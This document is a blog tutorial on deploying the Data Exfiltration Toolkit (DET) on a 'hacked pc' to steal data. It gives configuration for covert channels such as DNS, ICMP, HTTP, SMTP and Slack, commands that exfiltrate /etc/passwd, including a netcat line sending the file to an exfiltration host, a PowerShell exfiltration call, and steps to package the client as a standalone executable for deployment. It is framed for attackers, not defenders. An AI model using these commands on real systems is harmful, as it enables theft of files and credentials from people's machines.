In this tutorial we will use Data Exfiltration Toolkit (DET) on a hacked pc to gather data. A compromised system can be infected with DET and send data over various protocols to a control server.

All you have to do is setup a listening server on the attacker machine and deploy DET client on target machine.The client will communicate to the server via selected protocol and send data over LAN or WAN.


Installing Data Exfiltration Toolkit:

Clone the repo:

git clone


pip install -r requirements.txt --user


In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase, proxies and so on). A configuration example file has been provided and is called: config-sample.json

    "plugins": {
        "http": {
            "target": "",
            "port": 8080,
            "proxies": ["", ""]
        "google_docs": {
            "target": "",
            "port": 8080 
        "dns": {
            "key": "",
            "target": "",
            "port": 53,
            "proxies": ["", ""]
        "icmp": {
            "target": "",
            "proxies": ["", ""]
        "slack": {
            "api_token": "xoxb-XXXXXXXXXXX",
            "chan_id": "XXXXXXXXXXX",
            "bot_id": "<@XXXXXXXXXXX>:"
        "smtp": {
            "target": "",
            "port": 25,
            "proxies": ["", ""]
        "ftp": {
            "target": "",
            "port": 21,
            "proxies": ["", ""]
        "sip": {
            "target": "",
            "port": 5060,
            "proxies": ["", ""]
    "max_time_sleep": 10,
    "min_time_sleep": 1,
    "max_bytes_read": 400,
    "min_bytes_read": 300,
    "compression": 1


Help usage

python -h
usage: [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L | -Z]

Data Exfiltration Toolkit (@PaulWebSec)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode
  -Z          Proxy mode


To load every plugin:

python -L -c ./config.json

To load only twitter and gmail modules:

python -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python -L -c ./config.json -e dns


To load every plugin:

python -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python -c ./config.json -e dns -f /etc/passwd

You can also listen for files from stdin (e.g output of a netcat listener):

nc -lp 1337 | python -c ./config.json -e http -f stdin

Then send the file to netcat:

nc $exfiltration_host 1337 -q 0 < /etc/passwd

Don’t forget netcat’s -q 0 option so that netcat quits once it has finished sending the file.

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Proxy mode:

In this mode the client will proxify the incoming requests towards the final destination. The proxies addresses should be set in config.json file.

python -c ./config.json -p dns,icmp -Z

Standalone package

DET has been adapted in order to run as a standalone executable with the help of PyInstaller.

pip install pyinstaller

The spec file det.spec is provided in order to help you build your executable.

# -*- mode: python -*-

block_cipher = None

import sys
sys.modules['FixTk'] = None

a = Analysis([''],
             datas=[('plugins', 'plugins'), ('config-sample.json', '.')],
             hiddenimports=['plugins/dns', 'plugins/icmp'],
             excludes=['FixTk', 'tcl', 'tk', '_tkinter', 'tkinter', 'Tkinter'],
pyz = PYZ(a.pure, a.zipped_data,
exe = EXE(pyz,
          console=True )

Specify the modules you need to ship with you executable by editing the hiddenimports array. In the example above, PyInstaller will package the DNS and ICMP plugins along with your final executable. Finally, launch PyInstaller:

pyinstaller det.spec

Please note that the number of loaded plugins will reflect on the size of the final executable. If you have issues with the generated executable or found a workaround for a tricky situation, please open an issue so this guide can be updated for everyone.


So far, DET supports multiple protocols, listed here:

  •  HTTP(S)
  •  ICMP
  •  DNS
  •  SMTP/IMAP (Pure SMTP + Gmail)
  •  Raw TCP / UDP
  •  FTP
  •  SIP
  •  PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other “services”:

  •  Google Docs (Unauthenticated)
  •  Twitter (Direct Messages)
  •  Slack

Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you